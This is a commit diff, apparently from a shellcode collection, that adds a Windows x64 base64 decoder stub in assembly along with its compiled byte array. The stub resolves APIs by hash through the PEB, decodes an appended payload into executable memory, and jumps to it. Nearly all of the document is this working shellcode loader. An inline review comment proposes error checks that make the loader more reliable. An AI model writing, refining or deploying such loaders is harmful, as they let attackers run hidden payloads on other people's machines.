
Commit a48dca0

committed
upd
1 parent ebfa771 commit a48dca0

7 files changed

Lines changed: 646 additions & 7 deletions


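--- a/os/win/amd64/decode.asm
+++ b/os/win/amd64/decode.asm
@@ -0,0 +1,161 @@
+;
+; Copyright © 2019 Odzhan. All Rights Reserved.
+;
+; Redistribution and use in source and binary forms, with or without
+; modification, are permitted provided that the following conditions are
+; met:
+;
+; 1. Redistributions of source code must retain the above copyright
+; notice, this list of conditions and the following disclaimer.
+;
+; 2. Redistributions in binary form must reproduce the above copyright
+; notice, this list of conditions and the following disclaimer in the
+; documentation and/or other materials provided with the distribution.
+;
+; 3. The name of the author may not be used to endorse or promote products
+; derived from this software without specific prior written permission.
+;
+; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
+; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
+; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
+; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+; POSSIBILITY OF SUCH DAMAGE.
+;
+%include "../include.inc"
+
+bits 64
+
+; shadow or home space for API call
+struc home_space
+._rcx resq 1
+._rdx resq 1
+._r8 resq 1
+._r9 resq 1
+endstruc
+
+; structure for stack allocation
+struc ws
+.hs resb home_space_size
+
+.arg0 resq 1
+.arg1 resq 1
+.arg2 resq 1
+
+; local variables
+.outlen resd 1
+.outbuf resq 1
+.inlen resd 1
+.inbuf resq 1
+
+; function pointers
+
+; kernel32.dll
+._LoadLibraryA resq 1
+._lstrlenA resq 1
+._VirtualAlloc resq 1
+
+; crypt32.dll
+._CryptStringToBinary resq 1
+endstruc
+
+%define WORK_SPACE_LEN ((ws_size & -16) + 16) - 8
+
+; save non-volatile registers
+pushx rsi, rbx, rdi, rbp
+jmp load_get_api
+init_get_api:
+pop rbp
+xor eax, eax
+mov al, (decode_main - get_api1)
+add rax, rbp
+jmp rax
+load_get_api:
+call init_get_api
+
+%include "getapi1.asm"
+
+decode_main:
+; rbp points to get_api1
+; rax points to decode_main
+cqo
+mov dl, (inbuf - decode_main)
+add rax, rdx
+sub rsp, WORK_SPACE_LEN
+push rsp
+pop rbx
+lea rdi, [rbx + ws.inbuf]
+stosq
+
+lookup "kernel32.dll", "LoadLibraryA"
+stosq
+
+lookup "kernel32.dll", "lstrlenA"
+stosq
+
+lookup "kernel32.dll", "VirtualAlloc"
+stosq
+
+lookup "crypt32.dll", "CryptStringToBinaryA"
+stosq
+
+; inlen = lstrlenA(inbuf)
+xor eax, eax
+mov rcx, [rbx + ws.inbuf]
+call qword[rbx + ws._lstrlenA]
+mov dword[rbx + ws.inlen], eax
+
+; CryptStringToBinary(inbuf, inlen,
+; CRYPT_STRING_ANY, NULL, &outlen, NULL, NULL)
+xor edx, edx ; edx = 0
+mov [rbx + ws.arg2 ], rdx ; NULL
+mov [rbx + ws.arg1 ], rdx ; NULL
+mov [rbx + ws.outlen ], rdx ; outlen = 0
+lea rcx, [rbx + ws.outlen]
+mov [rbx + ws.arg0], rcx ; &outlen
+xor r9, r9 ; r8 = NULL
+push CRYPT_STRING_ANY ; r8 = CRYPT_STRING_ANY
+pop r8 ;
+xchg eax, edx ; rdx = inlen
+mov rcx, [rbx + ws.inbuf]
+call qword[rbx + ws._CryptStringToBinary]
+
+; out = VirtualAlloc(NULL, outlen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+push PAGE_EXECUTE_READWRITE
+pop r9
+push (MEM_COMMIT | MEM_RESERVE) >> 8
+pop r8
+shl r8, 8
+mov edx, [rbx + ws.outlen] ; rdx = outlen
+xor ecx, ecx ; rcx = 0
+call qword[rbx + ws._VirtualAlloc]
+mov qword[rbx + ws.outbuf], rax
+
+; CryptStringToBinary(inbuf, inlen,
+; CRYPT_STRING_ANY, outbuf, &outlen, NULL, NULL)
+xor edx, edx ; edx = 0
+mov [rbx + ws.arg2 ], rdx ; NULL
+mov [rbx + ws.arg1 ], rdx ; NULL
+lea rcx, [rbx + ws.outlen]
+mov [rbx + ws.arg0], rcx ; &outlen
+push rax ; r9 = outbuf
+pop r9
+push CRYPT_STRING_ANY ;
+pop r8 ; r8 = CRYPT_STRING_ANY
+mov edx, [rbx + ws.inlen] ; rdx = inlen
+mov rcx, [rbx + ws.inbuf]
+call qword[rbx + ws._CryptStringToBinary]
+mov rax, [rbx + ws.outbuf]
+
+add rsp, WORK_SPACE_LEN
+popx rsi, rbx, rdi, rbp
+jmp rax ; jump to code
+
+inbuf:
+; null terminated base64 string
+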
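Review bot: The results of `VirtualAlloc` and of both `CryptStringToBinary` calls are never checked, so when the allocation fails (rax = 0) the NULL is stored to `ws.outbuf`, passed on as the output buffer, reloaded, and the final `jmp rax ; jump to code` transfers control to address 0, while a failed second decode jumps into a buffer that was never filled. A `test rax, rax` / `jz .fail` after `call qword[rbx + ws._VirtualAlloc]`, and a `test eax, eax` on the BOOL after the second `call qword[rbx + ws._CryptStringToBinary]`, with `.fail` doing the same `add rsp, WORK_SPACE_LEN` / `popx rsi, rbx, rdi, rbp` and then `ret`, would turn the crash into a clean return to the caller. The comment on `xor r9, r9 ; r8 = NULL` names the wrong register: the instruction zeroes r9, the pbBinary argument of the size query, so `; r9 = NULL (pbBinary)` matches it. Separately, `mov [rbx + ws.outlen ], rdx` is a qword store into a field declared `resd 1`, which also clears the low half of the adjacent `ws.outbuf`; harmless today because `outbuf` is written afterwards, but `mov dword[rbx + ws.outlen], edx` says what is meant and will not break if the layout changes.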

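--- a/os/win/amd64/decode.h
+++ b/os/win/amd64/decode.h
@@ -0,0 +1,155 @@
+
+// Target architecture : X86 64
+
+#define DECODE_SIZE 353
+
+char DECODE[] = {
+/* 0000 */ "\x56" /* push rsi */
+/* 0001 */ "\x53" /* push rbx */
+/* 0002 */ "\x57" /* push rdi */
+/* 0003 */ "\x55" /* push rbp */
+/* 0004 */ "\xeb\x0a" /* jmp 0x10 */
+/* 0006 */ "\x5d" /* pop rbp */
+/* 0007 */ "\x31\xc0" /* xor eax, eax */
+/* 0009 */ "\xb0\x9b" /* mov al, 0x9b */
+/* 000B */ "\x48\x01\xe8" /* add rax, rbp */
+/* 000E */ "\xff\xe0" /* jmp rax */
+/* 0010 */ "\xe8\xf1\xff\xff\xff" /* call 6 */
+/* 0015 */ "\x56" /* push rsi */
+/* 0016 */ "\x53" /* push rbx */
+/* 0017 */ "\x57" /* push rdi */
+/* 0018 */ "\x55" /* push rbp */
+/* 0019 */ "\x41\x89\xc0" /* mov r8d, eax */
+/* 001C */ "\xeb\x72" /* jmp 0x90 */
+/* 001E */ "\x41\x59" /* pop r9 */
+/* 0020 */ "\x6a\x60" /* push 0x60 */
+/* 0022 */ "\x41\x5b" /* pop r11 */
+/* 0024 */ "\x65\x49\x8b\x03" /* mov rax, qword ptr gs:[r11] */
+/* 0028 */ "\x48\x8b\x40\x18" /* mov rax, qword ptr [rax + 0x18] */
+/* 002C */ "\x48\x8b\x78\x10" /* mov rdi, qword ptr [rax + 0x10] */
+/* 0030 */ "\xeb\x03" /* jmp 0x35 */
+/* 0032 */ "\x48\x8b\x3f" /* mov rdi, qword ptr [rdi] */
+/* 0035 */ "\x48\x8b\x5f\x30" /* mov rbx, qword ptr [rdi + 0x30] */
+/* 0039 */ "\x48\x85\xdb" /* test rbx, rbx */
+/* 003C */ "\x74\x4b" /* je 0x89 */
+/* 003E */ "\x8b\x73\x3c" /* mov esi, dword ptr [rbx + 0x3c] */
+/* 0041 */ "\x44\x01\xde" /* add esi, r11d */
+/* 0044 */ "\x8b\x4c\x33\x28" /* mov ecx, dword ptr [rbx + rsi + 0x28] */
+/* 0048 */ "\x67\xe3\xe7" /* jecxz 0x32 */
+/* 004B */ "\x48\x8d\x74\x0b\x0c" /* lea rsi, qword ptr [rbx + rcx + 0xc] */
+/* 0050 */ "\xad" /* lodsd eax, dword ptr [rsi] */
+/* 0051 */ "\x41\xff\xd1" /* call r9 */
+/* 0054 */ "\x50" /* push rax */
+/* 0055 */ "\x41\x5a" /* pop r10 */
+/* 0057 */ "\xad" /* lodsd eax, dword ptr [rsi] */
+/* 0058 */ "\xad" /* lodsd eax, dword ptr [rsi] */
+/* 0059 */ "\xad" /* lodsd eax, dword ptr [rsi] */
+/* 005A */ "\x91" /* xchg eax, ecx */
+/* 005B */ "\x67\xe3\xd4" /* jecxz 0x32 */
+/* 005E */ "\xad" /* lodsd eax, dword ptr [rsi] */
+/* 005F */ "\x92" /* xchg eax, edx */
+/* 0060 */ "\x48\x01\xda" /* add rdx, rbx */
+/* 0063 */ "\xad" /* lodsd eax, dword ptr [rsi] */
+/* 0064 */ "\x95" /* xchg eax, ebp */
+/* 0065 */ "\x48\x01\xdd" /* add rbp, rbx */
+/* 0068 */ "\xad" /* lodsd eax, dword ptr [rsi] */
+/* 0069 */ "\x96" /* xchg eax, esi */
+/* 006A */ "\x48\x01\xde" /* add rsi, rbx */
+/* 006D */ "\x48\x8b\x44\x8d\xfc" /* mov rax, qword ptr [rbp + rcx*4 - 4] */
+/* 0072 */ "\x41\xff\xd1" /* call r9 */
+/* 0075 */ "\x44\x01\xd0" /* add eax, r10d */
+/* 0078 */ "\x44\x39\xc0" /* cmp eax, r8d */
+/* 007B */ "\xe0\xf0" /* loopne 0x6d */
+/* 007D */ "\x75\xb3" /* jne 0x32 */
+/* 007F */ "\x0f\xb7\x04\x4e" /* movzx eax, word ptr [rsi + rcx*2] */
+/* 0083 */ "\x8b\x04\x82" /* mov eax, dword ptr [rdx + rax*4] */
+/* 0086 */ "\x48\x01\xc3" /* add rbx, rax */
+/* 0089 */ "\x48\x93" /* xchg rax, rbx */
+/* 008B */ "\x5d" /* pop rbp */
+/* 008C */ "\x5f" /* pop rdi */
+/* 008D */ "\x5b" /* pop rbx */
+/* 008E */ "\x5e" /* pop rsi */
+/* 008F */ "\xc3" /* ret */
+/* 0090 */ "\xe8\x89\xff\xff\xff" /* call 0x1e */
+/* 0095 */ "\x52" /* push rdx */
+/* 0096 */ "\x56" /* push rsi */
+/* 0097 */ "\x96" /* xchg eax, esi */
+/* 0098 */ "\x48\x01\xde" /* add rsi, rbx */
+/* 009B */ "\x31\xc0" /* xor eax, eax */
+/* 009D */ "\x99" /* cdq */
+/* 009E */ "\xac" /* lodsb al, byte ptr [rsi] */
+/* 009F */ "\x08\xc0" /* or al, al */
+/* 00A1 */ "\x74\x09" /* je 0xac */
+/* 00A3 */ "\x0c\x20" /* or al, 0x20 */
+/* 00A5 */ "\x01\xc2" /* add edx, eax */
+/* 00A7 */ "\xc1\xca\x08" /* ror edx, 8 */
+/* 00AA */ "\xeb\xf2" /* jmp 0x9e */
+/* 00AC */ "\x92" /* xchg eax, edx */
+/* 00AD */ "\x5e" /* pop rsi */
+/* 00AE */ "\x5a" /* pop rdx */
+/* 00AF */ "\xc3" /* ret */
+/* 00B0 */ "\x48\x99" /* cqo */
+/* 00B2 */ "\xb2\xb1" /* mov dl, 0xb1 */
+/* 00B4 */ "\x48\x01\xd0" /* add rax, rdx */
+/* 00B7 */ "\x48\x83\xec\x78" /* sub rsp, 0x78 */
+/* 00BB */ "\x54" /* push rsp */
+/* 00BC */ "\x5b" /* pop rbx */
+/* 00BD */ "\x48\x8d\x7b\x48" /* lea rdi, qword ptr [rbx + 0x48] */
+/* 00C1 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
+/* 00C3 */ "\xb8\x39\x81\x4f\x45" /* mov eax, 0x454f8139 */
+/* 00C8 */ "\xff\xd5" /* call rbp */
+/* 00CA */ "\x48\xab" /* stosq qword ptr [rdi], rax */
+/* 00CC */ "\xb8\xd7\x0e\xf5\xe0" /* mov eax, 0xe0f50ed7 */
+/* 00D1 */ "\xff\xd5" /* call rbp */
+/* 00D3 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
+/* 00D5 */ "\xb8\x57\x6d\x60\x46" /* mov eax, 0x46606d57 */
+/* 00DA */ "\xff\xd5" /* call rbp */
+/* 00DC */ "\x48\xab" /* stosq qword ptr [rdi], rax */
+/* 00DE */ "\xb8\xb1\x64\x4a\x3f" /* mov eax, 0x3f4a64b1 */
+/* 00E3 */ "\xff\xd5" /* call rbp */
+/* 00E5 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
+/* 00E7 */ "\x31\xc0" /* xor eax, eax */
+/* 00E9 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
+/* 00ED */ "\xff\x53\x58" /* call qword ptr [rbx + 0x58] */
+/* 00F0 */ "\x89\x43\x44" /* mov dword ptr [rbx + 0x44], eax */
+/* 00F3 */ "\x31\xd2" /* xor edx, edx */
+/* 00F5 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
+/* 00F9 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
+/* 00FD */ "\x48\x89\x53\x38" /* mov qword ptr [rbx + 0x38], rdx */
+/* 0101 */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
+/* 0105 */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
+/* 0109 */ "\x4d\x31\xc9" /* xor r9, r9 */
+/* 010C */ "\x6a\x07" /* push 7 */
+/* 010E */ "\x41\x58" /* pop r8 */
+/* 0110 */ "\x92" /* xchg eax, edx */
+/* 0111 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
+/* 0115 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
+/* 0118 */ "\x6a\x40" /* push 0x40 */
+/* 011A */ "\x41\x59" /* pop r9 */
+/* 011C */ "\x6a\x30" /* push 0x30 */
+/* 011E */ "\x41\x58" /* pop r8 */
+/* 0120 */ "\x49\xc1\xe0\x08" /* shl r8, 8 */
+/* 0124 */ "\x8b\x53\x38" /* mov edx, dword ptr [rbx + 0x38] */
+/* 0127 */ "\x31\xc9" /* xor ecx, ecx */
+/* 0129 */ "\xff\x53\x60" /* call qword ptr [rbx + 0x60] */
+/* 012C */ "\x48\x89\x43\x3c" /* mov qword ptr [rbx + 0x3c], rax */
+/* 0130 */ "\x31\xd2" /* xor edx, edx */
+/* 0132 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
+/* 0136 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
+/* 013A */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
+/* 013E */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
+/* 0142 */ "\x50" /* push rax */
+/* 0143 */ "\x41\x59" /* pop r9 */
+/* 0145 */ "\x6a\x07" /* push 7 */
+/* 0147 */ "\x41\x58" /* pop r8 */
+/* 0149 */ "\x8b\x53\x44" /* mov edx, dword ptr [rbx + 0x44] */
+/* 014C */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
+/* 0150 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
+/* 0153 */ "\x48\x8b\x43\x3c" /* mov rax, qword ptr [rbx + 0x3c] */
+/* 0157 */ "\x48\x83\xc4\x78" /* add rsp, 0x78 */
+/* 015B */ "\x5d" /* pop rbp */
+/* 015C */ "\x5f" /* pop rdi */
+/* 015D */ "\x5b" /* pop rbx */
+/* 015E */ "\x5e" /* pop rsi */
+/* 015F */ "\xff\xe0" /* jmp rax */
+};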
